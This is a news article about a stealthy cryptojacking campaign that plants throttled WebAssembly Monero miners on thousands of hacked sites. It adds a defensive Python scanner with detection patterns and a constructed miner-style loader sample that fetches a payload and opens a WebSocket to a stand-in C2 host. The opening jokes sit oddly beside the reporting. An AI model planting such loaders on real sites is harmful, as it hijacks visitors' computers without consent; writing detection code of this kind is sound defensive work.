Monero Miner Malware Strikes Again: Over 3,500 Sites Hijacked in Cryptojacking Surge
Another day, another crypto heist—only this time, hackers aren't stealing your coins. They're stealing your CPU.
Cybercriminals just weaponized 3,500+ websites to mine Monero in the wildest case of 'free cloud computing' since Wall Street discovered blockchain ETFs.
How it works: The malware silently hijacks visitors' processing power to mine XMR—because why bother with ransomware when you can monetize someone else's laptop fans spinning at 100%?
The kicker? Monero's privacy features make tracing these attacks harder than explaining Bitcoin maximalism to a goldbug. Meanwhile, security teams are playing whack-a-mole with infected sites while crypto traders shrug—'At least it's not another exchange hack.'
‘Stay low, mine slow’
Over half a decade later, the tactic appears to be staging a quiet comeback, shifting from noisy, CPU-choking scripts to low-profile miners built for stealth and persistence.
Rather than burning out devices, today’s campaigns spread quietly across thousands of sites, following a new playbook that, as c/side puts it, aims to “stay low, mine slow.”
That shift in strategy is no accident, according to an information security researcher familiar with the campaign who spoke to Decrypt on condition of anonymity.
The group appears to be reusing old infrastructure to prioritize long-term access and passive income, Decrypt was told.
“These groups most likely already control thousands of hacked WordPress sites and e-commerce stores from past Magecart campaigns,” the researcher told Decrypt.
Magecart campaigns are attacks where hackers inject malicious code into online checkout pages to steal payment information.
“Planting the miner was trivial; they simply added one more script to load the obfuscated JS, repurposing existing access,” the researcher said.
But what stands out, the researcher said, is how quietly the campaign operates, making it hard to detect with older methods.
“One way past cryptojacking scripts were detected was by their high CPU usage,” Decrypt was told. “This new wave avoids that by using throttled WebAssembly miners that stay under the radar, capping CPU usage and communicating over WebSockets.”
WebAssembly lets compiled code run at near-native speed inside a browser, while WebSockets keep a persistent, two-way connection to a server open. Combined, they let a miner do its work and report back without drawing attention.
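As an added illustration, not code from Decrypt, c/side or the campaign itself, the following Python script shows how a site owner could scan a page's HTML for the traits the researcher describes: an inline script that combines WebAssembly loading with WebSocket communication, plus obfuscation and throttling hints, while listing external script sources for manual review. The indicator patterns and the sample page are constructed for this example and are not indicators taken from the campaign.

```python
import re
from html.parser import HTMLParser

# Constructed indicator patterns for the miner profile described above.
INDICATORS = {
    "wasm": re.compile(r"WebAssembly\.(instantiate|compile|Module)"),
    "websocket": re.compile(r"new\s+WebSocket\s*\(|wss?://"),
    "obfuscation": re.compile(r"\b(eval|atob|Function)\s*\(|[A-Za-z0-9+/=]{80,}"),
    "throttle": re.compile(r"hardwareConcurrency|setTimeout|requestIdleCallback"),
}

class ScriptCollector(HTMLParser):
    """Collect inline <script> bodies and external script URLs from a page."""
    def __init__(self):
        super().__init__()
        self.inline, self.external, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._buf = []  # script bodies may arrive in chunks, so buffer them
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._buf = None

def scan_page(html):
    """Flag inline scripts using both WebAssembly and WebSockets; list external
    script URLs so each added <script src> can be reviewed by hand."""
    parser = ScriptCollector()
    parser.feed(html)
    suspicious = []
    for i, body in enumerate(parser.inline, start=1):
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(body))
        if "wasm" in hits and "websocket" in hits:
            suspicious.append((f"inline#{i}", hits))
    return {"external": parser.external, "suspicious": suspicious}

# Constructed sample page: one benign inline script, one miner-style loader.
SAMPLE_HTML = """<script src="/assets/app.js"></script>
<script>document.querySelector('#cart').addEventListener('click', () => fetch('/api/cart'));</script>
<script>var _0x1a = atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvd29ya2VyLndhc20=');
var ws = new WebSocket('wss://c2.example.invalid/ws');
WebAssembly.instantiateStreaming(fetch(_0x1a)).then(m => setTimeout(m.instance.exports.run, 200 / navigator.hardwareConcurrency));
</script>"""
```

Because the check keys on the WebAssembly and WebSocket combination rather than CPU load, a miner throttled to stay under a CPU threshold is still flagged.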
The risk isn't “directly targeting crypto users, since the script doesn't drain wallets, although technically, they could add a wallet drainer to the payload,” the anonymous researcher told Decrypt. “The real target is server and web app owners,” they added.